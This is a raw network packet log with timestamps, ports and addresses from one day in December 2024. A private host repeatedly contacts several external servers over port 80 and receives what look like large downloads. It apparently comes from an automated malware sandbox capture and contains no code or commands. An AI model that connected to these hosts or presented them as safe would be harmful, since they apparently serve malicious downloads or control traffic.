Dec 10, 2024 00:42:41.287311077 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.288202047 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.288239956 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.288353920 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.288388968 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.289320946 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.289375067 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.289545059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.289585114 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.290359020 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.290404081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.290478945 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.290510893 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.291493893 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.291528940 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.291604042 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.291640997 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.292562962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.292601109 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.292659044 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.292695999 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.293684959 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.293721914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.293781042 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.293819904 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.294768095 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.294805050 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.294851065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.294904947 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.295859098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.295902967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.295957088 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.295994043 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.296962023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.296998024 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.297053099 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.297089100 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.298094988 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.298131943 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.298141003 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.298175097 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.299129009 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.299170017 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.299221992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.299259901 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.300283909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.300328970 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.300406933 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.300445080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.301394939 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.301435947 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.301491976 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.301532030 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.302476883 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.302524090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.302546024 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.302582026 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.303561926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.303601027 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.303615093 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.303651094 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.304627895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.304667950 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.304765940 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.304804087 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.305741072 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.305780888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.305830956 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.305866957 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.306936979 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.306981087 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.306988955 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.307020903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.307904005 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.307945967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.308003902 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.308043003 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.309003115 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.309036970 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.309142113 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.309180975 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.310142994 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.310185909 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.310245037 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.310285091 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.311204910 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.311259031 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.311300993 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.311352968 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.312309027 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.312369108 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.312381029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.312437057 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.313393116 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.313440084 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.313483000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.313520908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.314496040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.314547062 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.314564943 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.314600945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.420630932 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.420737028 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.420842886 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.421164036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.421256065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:41.421310902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:41.641880989 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:41.642414093 CET	49760	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:41.761209011 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:41.761661053 CET	80	49760	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:41.761759996 CET	49760	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:41.765187979 CET	49760	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:41.884502888 CET	80	49760	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:43.581928968 CET	80	49760	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:43.581995010 CET	49760	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:45.524777889 CET	49760	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:45.524784088 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:43:04.834577084 CET	49778	80	192.168.2.4	185.215.113.43
Dec 10, 2024 00:43:04.954756975 CET	80	49778	185.215.113.43	192.168.2.4
Dec 10, 2024 00:43:04.954833031 CET	49778	80	192.168.2.4	185.215.113.43
Dec 10, 2024 00:43:04.955060005 CET	49778	80	192.168.2.4	185.215.113.43
Dec 10, 2024 00:43:05.074402094 CET	80	49778	185.215.113.43	192.168.2.4
Dec 10, 2024 00:43:06.281526089 CET	80	49778	185.215.113.43	192.168.2.4
Dec 10, 2024 00:43:06.283250093 CET	49778	80	192.168.2.4	185.215.113.43
Dec 10, 2024 00:43:07.798960924 CET	49778	80	192.168.2.4	185.215.113.43
Dec 10, 2024 00:43:07.799391985 CET	49784	80	192.168.2.4	185.215.113.43
Dec 10, 2024 00:43:07.920252085 CET	80	49784	185.215.113.43	192.168.2.4
Dec 10, 2024 00:43:07.920468092 CET	49784	80	192.168.2.4	185.215.113.43
Dec 10, 2024 00:43:07.920527935 CET	80	49778	185.215.113.43	192.168.2.4
Dec 10, 2024 00:43:07.920588970 CET	49778	80	192.168.2.4	185.215.113.43
Dec 10, 2024 00:43:07.920726061 CET	49784	80	192.168.2.4	185.215.113.43
Dec 10, 2024 00:43:08.041487932 CET	80	49784	185.215.113.43	192.168.2.4
Dec 10, 2024 00:43:09.281609058 CET	80	49784	185.215.113.43	192.168.2.4
Dec 10, 2024 00:43:09.281675100 CET	49784	80	192.168.2.4	185.215.113.43
Dec 10, 2024 00:43:09.285732031 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:09.406673908 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:09.406760931 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:09.406933069 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:09.527520895 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.727305889 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.727370977 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.727405071 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.727442980 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.727555037 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.727602959 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.727627039 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.727638006 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.727669001 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.727686882 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.727791071 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.727835894 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.727852106 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.727864981 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.727895021 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.727907896 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.728051901 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.728064060 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.728091955 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.728116989 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.846599102 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.846693993 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.846781969 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.846781969 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.850841045 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.850891113 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.850944996 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.850986958 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.919689894 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.919758081 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.919895887 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.919895887 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.923836946 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.923896074 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.925380945 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.925435066 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.925446987 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.925492048 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.933825016 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.933878899 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.933965921 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.934012890 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.942261934 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.942311049 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.942364931 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.942413092 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.950762987 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.950810909 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.950887918 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.950931072 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.959150076 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.959197998 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.959229946 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.959280014 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.967580080 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.967636108 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.967711926 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.967757940 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.976032972 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.976088047 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.976155043 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.976202965 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.984463930 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.984513998 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.984555960 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.984599113 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.992124081 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.992175102 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.992209911 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.992259026 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.999382973 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.999432087 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:10.999443054 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:10.999486923 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.039846897 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.039901018 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.039928913 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.039968967 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.111764908 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.111841917 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.111876011 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.111922979 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.114022970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.114084959 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.114108086 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.114156008 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.118521929 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.118571043 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.120173931 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.120227098 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.120326042 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.120373011 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.124739885 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.124787092 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.124918938 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.124984026 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.129265070 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.129312992 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.129355907 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.129404068 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.133853912 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.133900881 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.133904934 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.133943081 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.138355970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.138401985 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.138478041 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.138528109 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.142878056 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.142925024 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.142951012 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.142997980 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.147442102 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.147490025 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.147541046 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.147589922 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.151978970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.151997089 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.152028084 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.152048111 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.156508923 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.156558990 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.156649113 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.156696081 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.161016941 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.161067009 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.161170006 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.161220074 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.165566921 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.165637970 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.165667057 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.165713072 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.170128107 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.170195103 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.170222998 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.170274973 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.173640966 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.173688889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.173739910 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.173785925 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.177120924 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.177174091 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.177236080 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.177283049 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.180629969 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.180681944 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.180738926 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.180790901 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.184302092 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.184356928 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.184406042 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.184452057 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.187642097 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.187691927 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.187757969 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.187829971 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.191163063 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.191220999 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.191296101 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.191339016 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.194647074 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.194699049 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.194787025 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.194844961 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.198245049 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.198299885 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.198332071 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.198477030 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.201649904 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.201704025 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.201771021 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.201813936 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.205166101 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.205220938 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.304141998 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.304212093 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.304222107 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.304392099 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.305504084 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.305552006 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.305630922 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.305675983 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.308331966 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.308379889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.308466911 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.308515072 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.311203957 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.311254978 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.311265945 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.311316967 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.313935995 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.313983917 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.314086914 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.314140081 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.316584110 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.316647053 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.316685915 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.316734076 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.319236994 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.319288969 CET	49790	80	192.168.2.4	31.41.244.11
